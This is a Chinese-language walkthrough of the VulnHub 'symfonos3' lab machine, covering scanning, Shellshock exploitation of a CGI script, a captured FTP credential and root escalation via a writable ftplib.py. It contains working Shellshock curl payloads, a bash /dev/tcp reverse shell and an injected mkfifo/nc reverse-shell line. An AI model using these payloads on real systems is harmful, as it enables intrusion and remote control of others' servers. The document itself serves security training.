vulnhub-symfonos3
symfonos3靶机
靶机地址:https://www.vulnhub.com/entry/symfonos-31,332/
靶机 IP:192.168.3.143
kali IP:192.168.3.133
好,准备开启奇妙之旅
主机发现
root@kali:~# arp-scan -l

端口扫描
可以看到靶机开放了21、22、80端口

nikto也没扫出有用的信息

目录扫描
root@kali:~# dirb http://192.168.3.143


Can you bust the underworld?
http://192.168.3.143/cgi-bin/
http://192.168.3.143/gate/


使用dirbuster对cgi-bin目录进行爆破

尝试访问

其输出的信息都很相似

输出的信息是和uptime命令相似
使用nikto -h http://192.168.3.143/cgi-bin/underworld/
输出的信息很多

此处存在CVE-2014-6271漏洞,破壳ShellShock漏洞
参考链接:https://www.freebuf.com/articles/system/45390.html
root@kali:~# curl -A " () { :;};echo;echo 123;" http://192.168.3.143/cgi-bin/underworld/

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://192.168.3.143/cgi-bin/underworld

使用mfs搜索漏洞

exploit/multi/http/apache_mod_cgi_bash_env_exec





还可以使用payload进行反弹shell
root@kali:~# curl -A "() { :; }; /bin/bash -i > /dev/tcp/192.168.3.133/4444 0<&1 2>&1" http://192.168.3.143/cgi-bin/underworld
root@kali:~# nc -lvnp 4444

靶机IP变为192.168.3.146
再tmp目录下下载pspy64
cerberus@symfonos3:/tmp$ wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
添加可执行权限

cerberus@symfonos3:/tmp$ ./pspy64 -pf -i 1000
运行脚本

可以看到靶机有提供ftp服务,而ftp服务是明文传输,所以可以尝试抓取流量包进行分析
看看主机是否有tcpdump

需要再tmp目录下才有权限

每次ctrl c就会退出shell,emmm

在靶机上开启http服务
python -m SimpleHTTPServer 7777

root@kali:~# wget http://192.168.3.146:7777/ftp.pcap

用wireshark进行分析


USER hades
PASS PTpZTfU4vxgzvRBE
使用这个用户去ssh登录

hades对ftpclient只有读权限,查看文件内容

查看hades对那些文件具有可写权限
hades@symfonos3:/opt/ftpclient$ find / -writable -type d 2>/dev/null

咳咳,我到此为止了,看网上的writeup都是修改ftplib.py反弹shell,看看权限

不明白大佬们都是怎么改的动的,溜了溜了
最后,反弹shell
import os;os.system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.xxx.xxxx 4444 >/tmp/f')
··············莫的感情的分割线·················
不甘心,恢复快照直接ssh连接,又看了下权限,玄学,怎么不一样?但是可以改内容了


等了一会,接收到会话了

flag /root/ proof.txt

这台靶机是玄学吗?我也没发现gods这个用户,为什么?如果有dalao知道,请务必告诉我。

咳咳,最后的最后(别打,真的最后)
闲着没事,隔一段时间执行ls -l |grep ftplib一次这个命令

难道是作者设置的靶机开启规定时间内要做到提权这一步???????

浙公网安备 33010602011771号